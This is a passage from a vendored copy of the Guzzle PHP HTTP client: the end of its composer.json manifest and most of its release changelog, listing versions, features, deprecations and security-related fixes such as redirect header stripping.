"Guzzle is a PHP HTTP client library", "keywords": [ "framework", "http", "rest", "web service", "curl", "client", "HTTP client", "PSR-7", "PSR-18" ], "license": "MIT", "authors": [ { "name": "Graham Campbell", "email": "hello@gjcampbell.co.uk", "homepage": "https://github.com/GrahamCampbell" }, { "name": "Michael Dowling", "email": "mtdowling@gmail.com", "homepage": "https://github.com/mtdowling" }, { "name": "Jeremy Lindblom", "email": "jeremeamia@gmail.com", "homepage": "https://github.com/jeremeamia" }, { "name": "George Mponos", "email": "gmponos@gmail.com", "homepage": "https://github.com/gmponos" }, { "name": "Tobias Nyholm", "email": "tobias.nyholm@gmail.com", "homepage": "https://github.com/Nyholm" }, { "name": "Márk Sági-Kazár", "email": "mark.sagikazar@gmail.com", "homepage": "https://github.com/sagikazarmark" }, { "name": "Tobias Schultze", "email": "webmaster@tubo-world.de", "homepage": "https://github.com/Tobion" } ], "require": { "php": "^7.2.5 || ^8.0", "ext-json": "*", "guzzlehttp/promises": "^1.5.3 || ^2.0.1", "guzzlehttp/psr7": "^1.9.1 || ^2.5.1", "psr/http-client": "^1.0", "symfony/deprecation-contracts": "^2.2 || ^3.0" }, "provide": { "psr/http-client-implementation": "1.0" }, "require-dev": { "ext-curl": "*", "bamarni/composer-bin-plugin": "^1.8.2", "php-http/client-integration-tests": "dev-master#2c025848417c1135031fdf9c728ee53d0a7ceaee as 3.0.999", "php-http/message-factory": "^1.1", "phpunit/phpunit": "^8.5.36 || ^9.6.15", "psr/log": "^1.1 || ^2.0 || ^3.0" }, "suggest": { "ext-curl": "Required for CURL handler support", "ext-intl": "Required for Internationalized Domain Name (IDN) support", "psr/log": "Required for using the Log middleware" }, "config": { "allow-plugins": { "bamarni/composer-bin-plugin": true }, "preferred-install": "dist", "sort-packages": true }, "extra": { "bamarni-bin": { "bin-links": true, "forward-command": false } }, "autoload": { "psr-4": { "GuzzleHttp\\": "src/" }, "files": [ "src/functions_include.php" ] }, "autoload-dev": { "psr-4": { "GuzzleHttp\\Tests\\": "tests/" } } }google-api/vendor/guzzlehttp/guzzle/CHANGELOG.md000064400000252141147600400120015434 0ustar00# Change Log Please refer to [UPGRADING](UPGRADING.md) guide for upgrading to a major version. ## 7.8.1 - 2023-12-03 ### Changed - Updated links in docs to their canonical versions - Replaced `call_user_func*` with native calls ## 7.8.0 - 2023-08-27 ### Added - Support for PHP 8.3 - Added automatic closing of handles on `CurlFactory` object destruction ## 7.7.1 - 2023-08-27 ### Changed - Remove the need for `AllowDynamicProperties` in `CurlMultiHandler` ## 7.7.0 - 2023-05-21 ### Added - Support `guzzlehttp/promises` v2 ## 7.6.1 - 2023-05-15 ### Fixed - Fix `SetCookie::fromString` MaxAge deprecation warning and skip invalid MaxAge values ## 7.6.0 - 2023-05-14 ### Added - Support for setting the minimum TLS version in a unified way - Apply on request the version set in options parameters ## 7.5.2 - 2023-05-14 ### Fixed - Fixed set cookie constructor validation - Fixed handling of files with `'0'` body ### Changed - Corrected docs and default connect timeout value to 300 seconds ## 7.5.1 - 2023-04-17 ### Fixed - Fixed `NO_PROXY` settings so that setting the `proxy` option to `no` overrides the env variable ### Changed - Adjusted `guzzlehttp/psr7` version constraint to `^1.9.1 || ^2.4.5` ## 7.5.0 - 2022-08-28 ### Added - Support PHP 8.2 - Add request to delay closure params ## 7.4.5 - 2022-06-20 ### Fixed * Fix change in port should be considered a change in origin * Fix `CURLOPT_HTTPAUTH` option not cleared on change of origin ## 7.4.4 - 2022-06-09 ### Fixed * Fix failure to strip Authorization header on HTTP downgrade * Fix failure to strip the Cookie header on change in host or HTTP downgrade ## 7.4.3 - 2022-05-25 ### Fixed * Fix cross-domain cookie leakage ## 7.4.2 - 2022-03-20 ### Fixed - Remove curl auth on cross-domain redirects to align with the Authorization HTTP header - Reject non-HTTP schemes in StreamHandler - Set a default ssl.peer_name context in StreamHandler to allow `force_ip_resolve` ## 7.4.1 - 2021-12-06 ### Changed - Replaced implicit URI to string coercion [#2946](https://github.com/guzzle/guzzle/pull/2946) - Allow `symfony/deprecation-contracts` version 3 [#2961](https://github.com/guzzle/guzzle/pull/2961) ### Fixed - Only close curl handle if it's done [#2950](https://github.com/guzzle/guzzle/pull/2950) ## 7.4.0 - 2021-10-18 ### Added - Support PHP 8.1 [#2929](https://github.com/guzzle/guzzle/pull/2929), [#2939](https://github.com/guzzle/guzzle/pull/2939) - Support `psr/log` version 2 and 3 [#2943](https://github.com/guzzle/guzzle/pull/2943) ### Fixed - Make sure we always call `restore_error_handler()` [#2915](https://github.com/guzzle/guzzle/pull/2915) - Fix progress parameter type compatibility between the cURL and stream handlers [#2936](https://github.com/guzzle/guzzle/pull/2936) - Throw `InvalidArgumentException` when an incorrect `headers` array is provided [#2916](https://github.com/guzzle/guzzle/pull/2916), [#2942](https://github.com/guzzle/guzzle/pull/2942) ### Changed - Be more strict with types [#2914](https://github.com/guzzle/guzzle/pull/2914), [#2917](https://github.com/guzzle/guzzle/pull/2917), [#2919](https://github.com/guzzle/guzzle/pull/2919), [#2945](https://github.com/guzzle/guzzle/pull/2945) ## 7.3.0 - 2021-03-23 ### Added - Support for DER and P12 certificates [#2413](https://github.com/guzzle/guzzle/pull/2413) - Support the cURL (http://) scheme for StreamHandler proxies [#2850](https://github.com/guzzle/guzzle/pull/2850) - Support for `guzzlehttp/psr7:^2.0` [#2878](https://github.com/guzzle/guzzle/pull/2878) ### Fixed - Handle exceptions on invalid header consistently between PHP versions and handlers [#2872](https://github.com/guzzle/guzzle/pull/2872) ## 7.2.0 - 2020-10-10 ### Added - Support for PHP 8 [#2712](https://github.com/guzzle/guzzle/pull/2712), [#2715](https://github.com/guzzle/guzzle/pull/2715), [#2789](https://github.com/guzzle/guzzle/pull/2789) - Support passing a body summarizer to the http errors middleware [#2795](https://github.com/guzzle/guzzle/pull/2795) ### Fixed - Handle exceptions during response creation [#2591](https://github.com/guzzle/guzzle/pull/2591) - Fix CURLOPT_ENCODING not to be overwritten [#2595](https://github.com/guzzle/guzzle/pull/2595) - Make sure the Request always has a body object [#2804](https://github.com/guzzle/guzzle/pull/2804) ### Changed - The `TooManyRedirectsException` has a response [#2660](https://github.com/guzzle/guzzle/pull/2660) - Avoid "functions" from dependencies [#2712](https://github.com/guzzle/guzzle/pull/2712) ### Deprecated - Using environment variable GUZZLE_CURL_SELECT_TIMEOUT [#2786](https://github.com/guzzle/guzzle/pull/2786) ## 7.1.1 - 2020-09-30 ### Fixed - Incorrect EOF detection for response body streams on Windows. ### Changed - We dont connect curl `sink` on HEAD requests. - Removed some PHP 5 workarounds ## 7.1.0 - 2020-09-22 ### Added - `GuzzleHttp\MessageFormatterInterface` ### Fixed - Fixed issue that caused cookies with no value not to be stored. - On redirects, we allow all safe methods like GET, HEAD and OPTIONS. - Fixed logging on empty responses. - Make sure MessageFormatter::format returns string ### Deprecated - All functions in `GuzzleHttp` has been deprecated. Use static methods on `Utils` instead. - `ClientInterface::getConfig()` - `Client::getConfig()` - `Client::__call()` - `Utils::defaultCaBundle()` - `CurlFactory::LOW_CURL_VERSION_NUMBER` ## 7.0.1 - 2020-06-27 * Fix multiply defined functions fatal error [#2699](https://github.com/guzzle/guzzle/pull/2699) ## 7.0.0 - 2020-06-27 No changes since 7.0.0-rc1. ## 7.0.0-rc1 - 2020-06-15 ### Changed * Use error level for logging errors in Middleware [#2629](https://github.com/guzzle/guzzle/pull/2629) * Disabled IDN support by default and require ext-intl to use it [#2675](https://github.com/guzzle/guzzle/pull/2675) ## 7.0.0-beta2 - 2020-05-25 ### Added * Using `Utils` class instead of functions in the `GuzzleHttp` namespace. [#2546](https://github.com/guzzle/guzzle/pull/2546) * `ClientInterface::MAJOR_VERSION` [#2583](https://github.com/guzzle/guzzle/pull/2583) ### Changed * Avoid the `getenv` function when unsafe [#2531](https://github.com/guzzle/guzzle/pull/2531) * Added real client methods [#2529](https://github.com/guzzle/guzzle/pull/2529) * Avoid functions due to global install conflicts [#2546](https://github.com/guzzle/guzzle/pull/2546) * Use Symfony intl-idn polyfill [#2550](https://github.com/guzzle/guzzle/pull/2550) * Adding methods for HTTP verbs like `Client::get()`, `Client::head()`, `Client::patch()` etc [#2529](https://github.com/guzzle/guzzle/pull/2529) * `ConnectException` extends `TransferException` [#2541](https://github.com/guzzle/guzzle/pull/2541) * Updated the default User Agent to "GuzzleHttp/7" [#2654](https://github.com/guzzle/guzzle/pull/2654) ### Fixed * Various intl icu issues [#2626](https://github.com/guzzle/guzzle/pull/2626) ### Removed * Pool option `pool_size` [#2528](https://github.com/guzzle/guzzle/pull/2528) ## 7.0.0-beta1 - 2019-12-30 The diff might look very big but 95% of Guzzle users will be able to upgrade without modification. Please see [the upgrade document](UPGRADING.md) that describes all BC breaking changes. ### Added * Implement PSR-18 and dropped PHP 5 support [#2421](https://github.com/guzzle/guzzle/pull/2421) [#2474](https://github.com/guzzle/guzzle/pull/2474) * PHP 7 types [#2442](https://github.com/guzzle/guzzle/pull/2442) [#2449](https://github.com/guzzle/guzzle/pull/2449) [#2466](https://github.com/guzzle/guzzle/pull/2466) [#2497](https://github.com/guzzle/guzzle/pull/2497) [#2499](https://github.com/guzzle/guzzle/pull/2499) * IDN support for redirects [2424](https://github.com/guzzle/guzzle/pull/2424) ### Changed * Dont allow passing null as third argument to `BadResponseException::__construct()` [#2427](https://github.com/guzzle/guzzle/pull/2427) * Use SAPI constant instead of method call [#2450](https://github.com/guzzle/guzzle/pull/2450) * Use native function invocation [#2444](https://github.com/guzzle/guzzle/pull/2444) * Better defaults for PHP installations with old ICU lib [2454](https://github.com/guzzle/guzzle/pull/2454) * Added visibility to all constants [#2462](https://github.com/guzzle/guzzle/pull/2462) * Dont allow passing `null` as URI to `Client::request()` and `Client::requestAsync()` [#2461](https://github.com/guzzle/guzzle/pull/2461) * Widen the exception argument to throwable [#2495](https://github.com/guzzle/guzzle/pull/2495) ### Fixed * Logging when Promise rejected with a string [#2311](https://github.com/guzzle/guzzle/pull/2311) ### Removed * Class `SeekException` [#2162](https://github.com/guzzle/guzzle/pull/2162) * `RequestException::getResponseBodySummary()` [#2425](https://github.com/guzzle/guzzle/pull/2425) * `CookieJar::getCookieValue()` [#2433](https://github.com/guzzle/guzzle/pull/2433) * `uri_template()` and `UriTemplate` [#2440](https://github.com/guzzle/guzzle/pull/2440) * Request options `save_to` and `exceptions` [#2464](https://github.com/guzzle/guzzle/pull/2464) ## 6.5.2 - 2019-12-23 * idn_to_ascii() fix for old PHP versions [#2489](https://github.com/guzzle/guzzle/pull/2489) ## 6.5.1 - 2019-12-21 * Better defaults for PHP installations with old ICU lib [#2454](https://github.com/guzzle/guzzle/pull/2454) * IDN support for redirects [#2424](https://github.com/guzzle/guzzle/pull/2424) ## 6.5.0 - 2019-12-07 * Improvement: Added support for reset internal queue in MockHandler. [#2143](https://github.com/guzzle/guzzle/pull/2143) * Improvement: Added support to pass arbitrary options to `curl_multi_init`. [#2287](https://github.com/guzzle/guzzle/pull/2287) * Fix: Gracefully handle passing `null` to the `header` option. [#2132](https://github.com/guzzle/guzzle/pull/2132) * Fix: `RetryMiddleware` did not do exponential delay between retires due unit mismatch. [#2132](https://github.com/guzzle/guzzle/pull/2132) * Fix: Prevent undefined offset when using array for ssl_key options. [#2348](https://github.com/guzzle/guzzle/pull/2348) * Deprecated `ClientInterface::VERSION` ## 6.4.1 - 2019-10-23 * No `guzzle.phar` was created in 6.4.0 due expired API token. This release will fix that * Added `parent::__construct()` to `FileCookieJar` and `SessionCookieJar` ## 6.4.0 - 2019-10-23 * Improvement: Improved error messages when using curl < 7.21.2 [#2108](https://github.com/guzzle/guzzle/pull/2108) * Fix: Test if response is readable before returning a summary in `RequestException::getResponseBodySummary()` [#2081](https://github.com/guzzle/guzzle/pull/2081) * Fix: Add support for GUZZLE_CURL_SELECT_TIMEOUT environment variable [#2161](https://github.com/guzzle/guzzle/pull/2161) * Improvement: Added `GuzzleHttp\Exception\InvalidArgumentException` [#2163](https://github.com/guzzle/guzzle/pull/2163) * Improvement: Added `GuzzleHttp\_current_time()` to use `hrtime()` if that function exists. [#2242](https://github.com/guzzle/guzzle/pull/2242) * Improvement: Added curl's `appconnect_time` in `TransferStats` [#2284](https://github.com/guzzle/guzzle/pull/2284) * Improvement: Make GuzzleException extend Throwable wherever it's available [#2273](https://github.com/guzzle/guzzle/pull/2273) * Fix: Prevent concurrent writes to file when saving `CookieJar` [#2335](https://github.com/guzzle/guzzle/pull/2335) * Improvement: Update `MockHandler` so we can test transfer time [#2362](https://github.com/guzzle/guzzle/pull/2362) ## 6.3.3 - 2018-04-22 * Fix: Default headers when decode_content is specified ## 6.3.2 - 2018-03-26 * Fix: Release process ## 6.3.1 - 2018-03-26 * Bug fix: Parsing 0 epoch expiry times in cookies [#2014](https://github.com/guzzle/guzzle/pull/2014) * Improvement: Better ConnectException detection [#2012](https://github.com/guzzle/guzzle/pull/2012) * Bug fix: Malformed domain that contains a "/" [#1999](https://github.com/guzzle/guzzle/pull/1999) * Bug fix: Undefined offset when a cookie has no first key-value pair [#1998](https://github.com/guzzle/guzzle/pull/1998) * Improvement: Support PHPUnit 6 [#1953](https://github.com/guzzle/guzzle/pull/1953) * Bug fix: Support empty headers [#1915](https://github.com/guzzle/guzzle/pull/1915) * Bug fix: Ignore case during header modifications [#1916](https://github.com/guzzle/guzzle/pull/1916) + Minor code cleanups, documentation fixes and clarifications. ## 6.3.0 - 2017-06-22 * Feature: force IP resolution (ipv4 or ipv6) [#1608](https://github.com/guzzle/guzzle/pull/1608), [#1659](https://github.com/guzzle/guzzle/pull/1659) * Improvement: Don't include summary in exception message when body is empty [#1621](https://github.com/guzzle/guzzle/pull/1621) * Improvement: Handle `on_headers` option in MockHandler [#1580](https://github.com/guzzle/guzzle/pull/1580) * Improvement: Added SUSE Linux CA path [#1609](https://github.com/guzzle/guzzle/issues/1609) * Improvement: Use class reference for getting the name of the class instead of using hardcoded strings [#1641](https://github.com/guzzle/guzzle/pull/1641) * Feature: Added `read_timeout` option [#1611](https://github.com/guzzle/guzzle/pull/1611) * Bug fix: PHP 7.x fixes [#1685](https://github.com/guzzle/guzzle/pull/1685), [#1686](https://github.com/guzzle/guzzle/pull/1686), [#1811](https://github.com/guzzle/guzzle/pull/1811) * Deprecation: BadResponseException instantiation without a response [#1642](https://github.com/guzzle/guzzle/pull/1642) * Feature: Added NTLM auth [#1569](https://github.com/guzzle/guzzle/pull/1569) * Feature: Track redirect HTTP status codes [#1711](https://github.com/guzzle/guzzle/pull/1711) * Improvement: Check handler type during construction [#1745](https://github.com/guzzle/guzzle/pull/1745) * Improvement: Always include the Content-Length if there's a body [#1721](https://github.com/guzzle/guzzle/pull/1721) * Feature: Added convenience method to access a cookie by name [#1318](https://github.com/guzzle/guzzle/pull/1318) * Bug fix: Fill `CURLOPT_CAPATH` and `CURLOPT_CAINFO` properly [#1684](https://github.com/guzzle/guzzle/pull/1684) * Improvement: Use `\GuzzleHttp\Promise\rejection_for` function instead of object init [#1827](https://github.com/guzzle/guzzle/pull/1827) + Minor code cleanups, documentation fixes and clarifications. ## 6.2.3 - 2017-02-28 * Fix deprecations with guzzle/psr7 version 1.4 ## 6.2.2 - 2016-10-08 * Allow to pass nullable Response to delay callable * Only add scheme when host is present * Fix drain case where content-length is the literal string zero * Obfuscate in-URL credentials in exceptions ## 6.2.1 - 2016-07-18 * Address HTTP_PROXY security vulnerability, CVE-2016-5385: https://httpoxy.org/ * Fixing timeout bug with StreamHandler: https://github.com/guzzle/guzzle/pull/1488 * Only read up to `Content-Length` in PHP StreamHandler to avoid timeouts when a server does not honor `Connection: close`. * Ignore URI fragment when sending requests. ## 6.2.0 - 2016-03-21 * Feature: added `GuzzleHttp\json_encode` and `GuzzleHttp\json_decode`. https://github.com/guzzle/guzzle/pull/1389 * Bug fix: Fix sleep calculation when waiting for delayed requests. https://github.com/guzzle/guzzle/pull/1324 * Feature: More flexible history containers. https://github.com/guzzle/guzzle/pull/1373 * Bug fix: defer sink stream opening in StreamHandler. https://github.com/guzzle/guzzle/pull/1377 * Bug fix: do not attempt to escape cookie values. https://github.com/guzzle/guzzle/pull/1406 * Feature: report original content encoding and length on decoded responses. https://github.com/guzzle/guzzle/pull/1409 * Bug fix: rewind seekable request bodies before dispatching to cURL. https://github.com/guzzle/guzzle/pull/1422 * Bug fix: provide an empty string to `http_build_query` for HHVM workaround. https://github.com/guzzle/guzzle/pull/1367 ## 6.1.1 - 2015-11-22 * Bug fix: Proxy::wrapSync() now correctly proxies to the appropriate handler https://github.com/guzzle/guzzle/commit/911bcbc8b434adce64e223a6d1d14e9a8f63e4e4 * Feature: HandlerStack is now more generic. https://github.com/guzzle/guzzle/commit/f2102941331cda544745eedd97fc8fd46e1ee33e * Bug fix: setting verify to false in the StreamHandler now disables peer verification. https://github.com/guzzle/guzzle/issues/1256 * Feature: Middleware now uses an exception factory, including more error context. https://github.com/guzzle/guzzle/pull/1282 * Feature: better support for disabled functions. https://github.com/guzzle/guzzle/pull/1287 * Bug fix: fixed regression where MockHandler was not using `sink`. https://github.com/guzzle/guzzle/pull/1292 ## 6.1.0 - 2015-09-08 * Feature: Added the `on_stats` request option to provide access to transfer statistics for requests. https://github.com/guzzle/guzzle/pull/1202 * Feature: Added the ability to persist session cookies in CookieJars. https://github.com/guzzle/guzzle/pull/1195 * Feature: Some compatibility updates for Google APP Engine https://github.com/guzzle/guzzle/pull/1216 * Feature: Added support for NO_PROXY to prevent the use of a proxy based on a simple set of rules. https://github.com/guzzle/guzzle/pull/1197 * Feature: Cookies can now contain square brackets. https://github.com/guzzle/guzzle/pull/1237 * Bug fix: Now correctly parsing `=` inside of quotes in Cookies. https://github.com/guzzle/guzzle/pull/1232 * Bug fix: Cusotm cURL options now correctly override curl options of the same name. https://github.com/guzzle/guzzle/pull/1221 * Bug fix: Content-Type header is now added when using an explicitly provided multipart body. https://github.com/guzzle/guzzle/pull/1218 * Bug fix: Now ignoring Set-Cookie headers that have no name. * Bug fix: Reason phrase is no longer cast to an int in some cases in the cURL handler. https://github.com/guzzle/guzzle/pull/1187 * Bug fix: Remove the Authorization header when redirecting if the Host header changes. https://github.com/guzzle/guzzle/pull/1207 * Bug fix: Cookie path matching fixes https://github.com/guzzle/guzzle/issues/1129 * Bug fix: Fixing the cURL `body_as_string` setting https://github.com/guzzle/guzzle/pull/1201 * Bug fix: quotes are no longer stripped when parsing cookies. https://github.com/guzzle/guzzle/issues/1172 * Bug fix: `form_params` and `query` now always uses the `&` separator. https://github.com/guzzle/guzzle/pull/1163 * Bug fix: Adding a Content-Length to PHP stream wrapper requests if not set. https://github.com/guzzle/guzzle/pull/1189 ## 6.0.2 - 2015-07-04 * Fixed a memory leak in the curl handlers in which references to callbacks were not being removed by `curl_reset`. * Cookies are now extracted properly before redirects. * Cookies now allow more character ranges. * Decoded Content-Encoding responses are now modified to correctly reflect their state if the encoding was automatically removed by a handler. This means that the `Content-Encoding` header may be removed an the `Content-Length` modified to reflect the message size after removing the encoding. * Added a more explicit error message when trying to use `form_params` and `multipart` in the same request. * Several fixes for HHVM support. * Functions are now conditionally required using an additional level of indirection to help with global Composer installations. ## 6.0.1 - 2015-05-27 * Fixed a bug with serializing the `query` request option where the `&` separator was missing. * Added a better error message for when `body` is provided as an array. Please use `form_params` or `multipart` instead. * Various doc fixes. ## 6.0.0 - 2015-05-26 * See the UPGRADING.md document for more information. * Added `multipart` and `form_params` request options. * Added `synchronous` request option. * Added the `on_headers` request option. * Fixed `expect` handling. * No longer adding default middlewares in the client ctor. These need to be present on the provided handler in order to work. * Requests are no longer initiated when sending async requests with the CurlMultiHandler. This prevents unexpected recursion from requests completing while ticking the cURL loop. * Removed the semantics of setting `default` to `true`. This is no longer required now that the cURL loop is not ticked for async requests. * Added request and response logging middleware. * No longer allowing self signed certificates when using the StreamHandler. * Ensuring that `sink` is valid if saving to a file. * Request exceptions now include a "handler context" which provides handler specific contextual information. * Added `GuzzleHttp\RequestOptions` to allow request options to be applied using constants. * `$maxHandles` has been removed from CurlMultiHandler. * `MultipartPostBody` is now part of the `guzzlehttp/psr7` package. ## 5.3.0 - 2015-05-19 * Mock now supports `save_to` * Marked `AbstractRequestEvent::getTransaction()` as public. * Fixed a bug in which multiple headers using different casing would overwrite previous headers in the associative array. * Added `Utils::getDefaultHandler()` * Marked `GuzzleHttp\Client::getDefaultUserAgent` as deprecated. * URL scheme is now always lowercased. ## 6.0.0-beta.1 * Requires PHP >= 5.5 * Updated to use PSR-7 * Requires immutable messages, which basically means an event based system owned by a request instance is no longer possible. * Utilizing the [Guzzle PSR-7 package](https://github.com/guzzle/psr7). * Removed the dependency on `guzzlehttp/streams`. These stream abstractions are available in the `guzzlehttp/psr7` package under the `GuzzleHttp\Psr7` namespace. * Added middleware and handler system * Replaced the Guzzle event and subscriber system with a middleware system. * No longer depends on RingPHP, but rather places the HTTP handlers directly in Guzzle, operating on PSR-7 messages. * Retry logic is now encapsulated in `GuzzleHttp\Middleware::retry`, which means the `guzzlehttp/retry-subscriber` is now obsolete. * Mocking responses is now handled using `GuzzleHttp\Handler\MockHandler`. * Asynchronous responses * No longer supports the `future` request option to send an async request. Instead, use one of the `*Async` methods of a client (e.g., `requestAsync`, `getAsync`, etc.). * Utilizing `GuzzleHttp\Promise` instead of React's promise library to avoid recursion required by chaining and forwarding react promises. See https://github.com/guzzle/promises * Added `requestAsync` and `sendAsync` to send request asynchronously. * Added magic methods for `getAsync()`, `postAsync()`, etc. to send requests asynchronously. * Request options * POST and form updates * Added the `form_fields` and `form_files` request options. * Removed the `GuzzleHttp\Post` namespace. * The `body` request option no longer accepts an array for POST requests. * The `exceptions` request option has been deprecated in favor of the `http_errors` request options. * The `save_to` request option has been deprecated in favor of `sink` request option. * Clients no longer accept an array of URI template string and variables for URI variables. You will need to expand URI templates before passing them into a client constructor or request method. * Client methods `get()`, `post()`, `put()`, `patch()`, `options()`, etc. are now magic methods that will send synchronous requests. * Replaced `Utils.php` with plain functions in `functions.php`. * Removed `GuzzleHttp\Collection`. * Removed `GuzzleHttp\BatchResults`. Batched pool results are now returned as an array. * Removed `GuzzleHttp\Query`. Query string handling is now handled using an associative array passed into the `query` request option. The query string is serialized using PHP's `http_build_query`. If you need more control, you can pass the query string in as a string. * `GuzzleHttp\QueryParser` has been replaced with the `GuzzleHttp\Psr7\parse_query`. ## 5.2.0 - 2015-01-27 * Added `AppliesHeadersInterface` to make applying headers to a request based on the body more generic and not specific to `PostBodyInterface`. * Reduced the number of stack frames needed to send requests. * Nested futures are now resolved in the client rather than the RequestFsm * Finishing state transitions is now handled in the RequestFsm rather than the RingBridge. * Added a guard in the Pool class to not use recursion for request retries. ## 5.1.0 - 2014-12-19 * Pool class no longer uses recursion when a request is intercepted. * The size of a Pool can now be dynamically adjusted using a callback. See https://github.com/guzzle/guzzle/pull/943. * Setting a request option to `null` when creating a request with a client will ensure that the option is not set. This allows you to overwrite default request options on a per-request basis. See https://github.com/guzzle/guzzle/pull/937. * Added the ability to limit which protocols are allowed for redirects by specifying a `protocols` array in the `allow_redirects` request option. * Nested futures due to retries are now resolved when waiting for synchronous responses. See https://github.com/guzzle/guzzle/pull/947. * `"0"` is now an allowed URI path. See https://github.com/guzzle/guzzle/pull/935. * `Query` no longer typehints on the `$query` argument in the constructor, allowing for strings and arrays. * Exceptions thrown in the `end` event are now correctly wrapped with Guzzle specific exceptions if necessary. ## 5.0.3 - 2014-11-03 This change updates query strings so that they are treated as un-encoded values by default where the value represents an un-encoded value to send over the wire. A Query object then encodes the value before sending over the wire. This means that even value query string values (e.g., ":") are url encoded. This makes the Query class match PHP's http_build_query function. However, if you want to send requests over the wire using valid query string characters that do not need to be encoded, then you can provide a string to Url::setQuery() and pass true as the second argument to specify that the query string is a raw string that should not be parsed or encoded (unless a call to getQuery() is subsequently made, forcing the query-string to be converted into a Query object). ## 5.0.2 - 2014-10-30 * Added a trailing `\r\n` to multipart/form-data payloads. See https://github.com/guzzle/guzzle/pull/871 * Added a `GuzzleHttp\Pool::send()` convenience method to match the docs. * Status codes are now returned as integers. See https://github.com/guzzle/guzzle/issues/881 * No longer overwriting an existing `application/x-www-form-urlencoded` header when sending POST requests, allowing for customized headers. See https://github.com/guzzle/guzzle/issues/877 * Improved path URL serialization. * No longer double percent-encoding characters in the path or query string if they are already encoded. * Now properly encoding the supplied path to a URL object, instead of only encoding ' ' and '?'. * Note: This has been changed in 5.0.3 to now encode query string values by default unless the `rawString` argument is provided when setting the query string on a URL: Now allowing many more characters to be present in the query string without being percent encoded. See https://datatracker.ietf.org/doc/html/rfc3986#appendix-A ## 5.0.1 - 2014-10-16 Bugfix release. * Fixed an issue where connection errors still returned response object in error and end events event though the response is unusable. This has been corrected so that a response is not returned in the `getResponse` method of these events if the response did not complete. https://github.com/guzzle/guzzle/issues/867 * Fixed an issue where transfer statistics were not being populated in the RingBridge. https://github.com/guzzle/guzzle/issues/866 ## 5.0.0 - 2014-10-12 Adding support for non-blocking responses and some minor API cleanup. ### New Features * Added support for non-blocking responses based on `guzzlehttp/guzzle-ring`. * Added a public API for creating a default HTTP adapter. * Updated the redirect plugin to be non-blocking so that redirects are sent concurrently. Other plugins like this can now be updated to be non-blocking. * Added a "progress" event so that you can get upload and download progress events. * Added `GuzzleHttp\Pool` which implements FutureInterface and transfers requests concurrently using a capped pool size as efficiently as possible. * Added `hasListeners()` to EmitterInterface. * Removed `GuzzleHttp\ClientInterface::sendAll` and marked `GuzzleHttp\Client::sendAll` as deprecated (it's still there, just not the recommended way). ### Breaking changes The breaking changes in this release are relatively minor. The biggest thing to look out for is that request and response objects no longer implement fluent interfaces. * Removed the fluent interfaces (i.e., `return $this`) from requests, responses, `GuzzleHttp\Collection`, `GuzzleHttp\Url`, `GuzzleHttp\Query`, `GuzzleHttp\Post\PostBody`, and `GuzzleHttp\Cookie\SetCookie`. This blog post provides a good outline of why I did this: https://ocramius.github.io/blog/fluent-interfaces-are-evil/. This also makes the Guzzle message interfaces compatible with the current PSR-7 message proposal. * Removed "functions.php", so that Guzzle is truly PSR-4 compliant. Except for the HTTP request functions from function.php, these functions are now implemented in `GuzzleHttp\Utils` using camelCase. `GuzzleHttp\json_decode` moved to `GuzzleHttp\Utils::jsonDecode`. `GuzzleHttp\get_path` moved to `GuzzleHttp\Utils::getPath`. `GuzzleHttp\set_path` moved to `GuzzleHttp\Utils::setPath`. `GuzzleHttp\batch` should now be `GuzzleHttp\Pool::batch`, which returns an `objectStorage`. Using functions.php caused problems for many users: they aren't PSR-4 compliant, require an explicit include, and needed an if-guard to ensure that the functions are not declared multiple times. * Rewrote adapter layer. * Removing all classes from `GuzzleHttp\Adapter`, these are now implemented as callables that are stored in `GuzzleHttp\Ring\Client`. * Removed the concept of "parallel adapters". Sending requests serially or concurrently is now handled using a single adapter. * Moved `GuzzleHttp\Adapter\Transaction` to `GuzzleHttp\Transaction`. The Transaction object now exposes the request, response, and client as public properties. The getters and setters have been removed. * Removed the "headers" event. This event was only useful for changing the body a response once the headers of the response were known. You can implement a similar behavior in a number of ways. One example might be to use a FnStream that has access to the transaction being sent. For example, when the first byte is written, you could check if the response headers match your expectations, and if so, change the actual stream body that is being written to. * Removed the `asArray` parameter from `GuzzleHttp\Message\MessageInterface::getHeader`. If you want to get a header value as an array, then use the newly added `getHeaderAsArray()` method of `MessageInterface`. This change makes the Guzzle interfaces compatible with the PSR-7 interfaces. * `GuzzleHttp\Message\MessageFactory` no longer allows subclasses to add custom request options using double-dispatch (this was an implementation detail). Instead, you should now provide an associative array to the constructor which is a mapping of the request option name mapping to a function that applies the option value to a request. * Removed the concept of "throwImmediately" from exceptions and error events. This control mechanism was used to stop a transfer of concurrent requests from completing. This can now be handled by throwing the exception or by cancelling a pool of requests or each outstanding future request individually. * Updated to "GuzzleHttp\Streams" 3.0. * `GuzzleHttp\Stream\StreamInterface::getContents()` no longer accepts a `maxLen` parameter. This update makes the Guzzle streams project compatible with the current PSR-7 proposal. * `GuzzleHttp\Stream\Stream::__construct`, `GuzzleHttp\Stream\Stream::factory`, and `GuzzleHttp\Stream\Utils::create` no longer accept a size in the second argument. They now accept an associative array of options, including the "size" key and "metadata" key which can be used to provide custom metadata. ## 4.2.2 - 2014-09-08 * Fixed a memory leak in the CurlAdapter when reusing cURL handles. * No longer using `request_fulluri` in stream adapter proxies. * Relative redirects are now based on the last response, not the first response. ## 4.2.1 - 2014-08-19 * Ensuring that the StreamAdapter does not always add a Content-Type header * Adding automated github releases with a phar and zip ## 4.2.0 - 2014-08-17 * Now merging in default options using a case-insensitive comparison. Closes https://github.com/guzzle/guzzle/issues/767 * Added the ability to automatically decode `Content-Encoding` response bodies using the `decode_content` request option. This is set to `true` by default to decode the response body if it comes over the wire with a `Content-Encoding`. Set this value to `false` to disable decoding the response content, and pass a string to provide a request `Accept-Encoding` header and turn on automatic response decoding. This feature now allows you to pass an `Accept-Encoding` header in the headers of a request but still disable automatic response decoding. Closes https://github.com/guzzle/guzzle/issues/764 * Added the ability to throw an exception immediately when transferring requests in parallel. Closes https://github.com/guzzle/guzzle/issues/760 * Updating guzzlehttp/streams dependency to ~2.1 * No longer utilizing the now deprecated namespaced methods from the stream package. ## 4.1.8 - 2014-08-14 * Fixed an issue in the CurlFactory that caused setting the `stream=false` request option to throw an exception. See: https://github.com/guzzle/guzzle/issues/769 * TransactionIterator now calls rewind on the inner iterator. See: https://github.com/guzzle/guzzle/pull/765 * You can now set the `Content-Type` header to `multipart/form-data` when creating POST requests to force multipart bodies. See https://github.com/guzzle/guzzle/issues/768 ## 4.1.7 - 2014-08-07 * Fixed an error in the HistoryPlugin that caused the same request and response to be logged multiple times when an HTTP protocol error occurs. * Ensuring that cURL does not add a default Content-Type when no Content-Type has been supplied by the 